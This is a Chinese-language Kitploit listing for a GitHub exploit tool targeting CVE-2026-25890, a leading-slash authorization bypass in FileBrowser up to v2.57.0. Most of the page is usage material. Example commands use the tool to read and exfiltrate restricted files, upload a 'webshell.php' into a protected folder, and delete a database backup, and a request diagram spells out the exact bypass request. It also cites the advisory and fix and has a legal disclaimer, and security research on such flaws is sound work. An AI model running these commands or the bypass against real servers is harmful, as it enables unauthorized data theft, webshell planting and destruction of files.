Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25890-FileBrowser-Access-Control-Bypass — CVE-2026-25890 的漏洞利用程序,该漏洞是 FileBrowser <= v2.57.0 中基于路径的授权绕过漏洞,允许已认证的低权限用户通过多个前导斜杠读取、上传和删除受限文件。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-25890-filebrowser-access-control-bypass
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubmbanyamer/cve-2026-25890-filebrowser-access-control-bypass

CVE-2026-25890-FileBrowser-Access-Control-Bypass

CVE-2026-25890 的漏洞利用程序,该漏洞是 FileBrowser <= v2.57.0 中基于路径的授权绕过漏洞,允许已认证的低权限用户通过多个前导斜杠读取、上传和删除受限文件。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
36个月前尚未审核
分享

CVE-2026-25890 - FileBrowser 访问控制绕过

Author GitHub license Python version CVE Exploit-DB Tested on

未认证用户无法利用此漏洞——需要有效的低权限凭据,且该凭据被限制访问目标路径。

FileBrowser ≤ v2.57.0 中基于路径的授权绕过,利用多个前导斜杠(//private 而非 /private)来规避 strings.HasPrefix() 检查,而文件系统仍会提供规范化路径。

已在 v2.57.1 中修复(提交 489af403... – 移除了 )。

r.SkipClean(true)

📦 功能特性

  • 读取受限文件
  • 上传文件到受限目录
  • 删除受限文件
  • 自定义前导斜杠数量以进行绕过测试
  • 将泄露的文件保存到本地
  • 详细内容预览
  • 简洁的 argparse 命令行界面

🛠️ 安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# 除标准库和 requests 外无其他依赖
pip install requests

🚀 使用方法

root@kitploit:~
python3 exploit.py --help

基本示例

root@kitploit:~
# 读取受限文件
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
root@kitploit:~
# 上传恶意文件到受限文件夹
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
root@kitploit:~
# 删除受限文件
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4

📊 PoC 攻击流程

root@kitploit:~
sequenceDiagram
    participant Attacker
    participant FileBrowser ≤ v2.57.0
    participant Gorilla Mux Router
    participant Auth Middleware
    participant Filesystem Handler

    Attacker->>FileBrowser: GET /api/resources/private/secret.txt<br>(正常请求)
    FileBrowser->>Gorilla Mux: Path = /api/resources/private/secret.txt
    Gorilla Mux->>Auth Middleware: path = "/private/secret.txt"
    Auth Middleware->>Auth Middleware: strings.HasPrefix("/private/secret.txt", disallowed="/private") → true
    Auth Middleware->>Attacker: 403 Forbidden

    Note over Attacker,FileBrowser: 攻击者尝试绕过

    Attacker->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Path = /api/resources//private/secret.txt<br>(SkipClean=true → 不进行规范化)
    Gorilla Mux->>Auth Middleware: path = "//private/secret.txt"
    Auth Middleware->>Auth Middleware: HasPrefix("//private/secret.txt", "/private") → false
    Auth Middleware->>Filesystem Handler: 允许 → 继续
    Filesystem Handler->>Filesystem: 规范化 // → /private/secret.txt
    Filesystem->>Filesystem Handler: 返回文件内容
    Filesystem Handler->>Attacker: 200 OK + 机密内容

⚠️ 法律与道德免责声明

此概念验证严格用于教育和安全研究目的。
请勿在未经所有者明确书面许可的情况下对任何系统使用此代码。
在大多数司法管辖区(如 CFAA、Computer Misuse Act),未经授权访问或修改系统属于违法行为。

📜 参考资料

  • GitHub Advisory GHSA-4mh3-h929-w968
  • 修复提交
  • v2.57.1 发布版本

❤️ 致谢

漏洞利用作者:Mohammed Idrees Banyamer
国家:约旦
Instagram:@banyamer_security

如果你觉得有用,请给仓库点个星 ⭐!


最后更新:2026 年 2 月

下载工具